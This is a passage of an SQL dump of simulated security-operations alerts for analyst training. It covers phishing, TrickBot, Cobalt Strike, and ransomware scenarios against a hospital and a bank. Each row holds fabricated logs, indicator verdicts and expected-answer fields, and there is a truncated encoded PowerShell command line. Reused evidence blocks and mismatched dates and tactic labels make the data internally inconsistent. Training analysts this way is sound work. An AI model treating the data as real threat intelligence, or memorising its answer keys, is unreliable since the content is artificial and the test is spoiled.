content.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation 
campaign.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.892Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(289, 'Phishing Email Detected', 'medium', 'Email Gateway', 'A phishing email was detected targeting hospital staff. The email contains a malicious link designed to download TrickBot malware upon clicking.', 'Phishing', 'T1566.001', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"email_subject\":\"Important Update Required\",\"sender_email\":\"attacker@example.com\",\"recipient_email\":\"staff@hospital.org\",\"malicious_link\":\"http://malicious-link.com/download\",\"attachment\":\"none\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"update-instructions.html\"}', '2025-12-31 15:22:50', '2026-02-27 02:24:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing email address associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"URL associated with TrickBot malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"suspicious\",\"details\":\"IP address flagged for suspicious activity in recent phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to TrickBot malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"update-instructions.html\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File 
name commonly used in phishing emails.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.893Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(290, 'TrickBot Malware Execution', 'high', 'EDR', 'TrickBot malware was executed on an employee\'s workstation, allowing the attacker to establish a foothold in the network. The malware is designed to harvest credentials and facilitate further attacks.', 'Malware', 'TA0002 - Execution', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-10T14:32:16Z\",\"event_type\":\"malware_execution\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"34.210.123.158\",\"user\":\"jdoe\",\"process_name\":\"trickbot.exe\",\"process_id\":\"5678\",\"file_hash\":\"3f0a2f5e4d3a9b5c7f6e9df123456789\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\trickbot.exe\",\"detected_by\":\"EDR Agent\",\"malicious_score\":95}', '2025-12-31 15:22:50', '2026-02-27 02:28:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"34.210.123.158\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This IP address has been associated with TrickBot C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f0a2f5e4d3a9b5c7f6e9df123456789\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known TrickBot malware hash.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"trickbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with TrickBot malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Username of the employee whose workstation was 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(291, 'Persistence Mechanism Identified', 'high', 'EDR', 'The attacker has established a persistence mechanism on the compromised system using TrickBot. This allows them to maintain access even after system reboots.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-24T14:23:52Z\",\"event_id\":\"12345\",\"hostname\":\"victim-pc\",\"user\":\"jdoe\",\"process_name\":\"trickbot.exe\",\"process_id\":\"6789\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\TrickBot\",\"registry_value\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"command_line\":\"\\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\\\" --silent\"}', '2025-12-31 15:22:50', '2026-02-27 02:32:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal company IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"Known TrickBot command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with TrickBot malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"trickbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Executable linked to TrickBot 
malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"clean\",\"details\":\"Valid user in the company directory\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(292, 'Cobalt Strike Beacon Detected', 'high', 'Network Traffic Analysis', 'The attacker deploys Cobalt Strike beacons to move laterally, targeting critical systems within the hospital network to spread the ransomware.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:22:53Z\",\"source_ip\":\"193.161.35.75\",\"destination_ip\":\"10.10.15.23\",\"protocol\":\"HTTP\",\"uri\":\"/stager\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"beacon.exe\",\"username\":\"janedoe\",\"action\":\"download\"}', '2025-12-31 15:22:50', '2026-02-27 02:37:57', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"193.161.35.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Cobalt Strike command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal hospital network endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cobalt Strike payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"beacon.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in lateral movement\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"janedoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unexpected activity from this user 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(293, 'Ransomware Encryption Initiated', 'critical', 'EDR', 'The ransomware has been executed across the hospital\'s network, encrypting patient data and rendering systems unusable. Immediate focus is required on data recovery and remediation.', 'Exfiltration', 'T1486: Data Encrypted for Impact', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-25T14:35:21Z\",\"event_id\":\"12345\",\"source_ip\":\"198.51.100.23\",\"target_ip\":\"10.0.0.25\",\"username\":\"hospital_admin\",\"file_affected\":\"patient_records.dat\",\"file_hash\":\"a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\",\"action\":\"encrypt\",\"process_name\":\"ransomware.exe\",\"process_id\":\"6789\",\"severity\":\"critical\"}', '2025-12-31 15:22:50', '2026-02-27 02:46:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known ransomware command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Hospital network server being targeted.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware strain.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"patient_records.dat\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical patient data file targeted for encryption.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"hospital_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Admin account used to execute the 
ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(294, 'Initial Access via Spear Phishing Campaign', 'high', 'Email Gateway', 'An email containing a malicious attachment was sent to key personnel within the bank, appearing as an urgent internal communication. The attachment, if opened, installs malware to gain access to the internal network.', 'Phishing', 'T1566.001 - Phishing: Spear Phishing Attachment', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"email_subject\":\"Urgent: Updated Security Protocols\",\"sender_email\":\"it-security@bank.com\",\"recipient_email\":\"j.doe@bank.com\",\"attachment_name\":\"SecurityUpdate.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"recipient_ip\":\"10.0.1.15\",\"smtp_id\":\"<20231005142345.1.1234567890@bank.com>\"}', '2025-12-31 15:23:56', '2026-02-27 02:49:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-security@bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently used in phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with trojans.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Spear Phishing Campaign\",\"date\":\"2026-02-01T20:32:18.897Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(295, 'Malware Execution and Credential Harvesting', 'high', 'EDR', 'The malware was executed on a compromised system, allowing attackers to harvest credentials of bank clerks and administrators. This activity was detected following a successful phishing attempt, which is pivotal for attackers to gain further access to critical financial systems.', 'Malware', 'T1059 - Command and Scripting Interpreter', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:22:58Z\",\"event_type\":\"execution\",\"hostname\":\"finance-dept-pc1\",\"internal_ip\":\"192.168.10.45\",\"external_ip\":\"203.0.113.15\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"credential_harvester.exe\",\"executing_user\":\"jdoe\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\credential_harvester.exe\",\"detected_by\":\"EDR\",\"status\":\"malicious\",\"os\":\"Windows 10\",\"process_id\":4567}', '2025-12-31 15:23:56', '2026-02-27 02:51:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash matches a known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credential_harvester.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable used for credential 
harvesting.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(296, 'Lateral Movement through Network Exploitation', 'high', 'Network Monitoring', 'Using the harvested credentials and specialized administrative tools, the attackers move laterally across the network. They target systems responsible for managing ATM withdrawal limits and SWIFT transactions, setting the stage for unauthorized financial operations.', 'Lateral Movement', 'T1021', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.2.15\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe_admin\",\"used_tool\":\"PsExec\",\"target_system\":\"ATM-Controller-02\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event\":\"Lateral movement detected from 192.168.1.105 to 10.0.2.15 using PsExec by user jdoe_admin.\"}', '2025-12-31 15:23:56', '2026-02-27 02:54:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised administrative account used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known 
malicious administrative tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
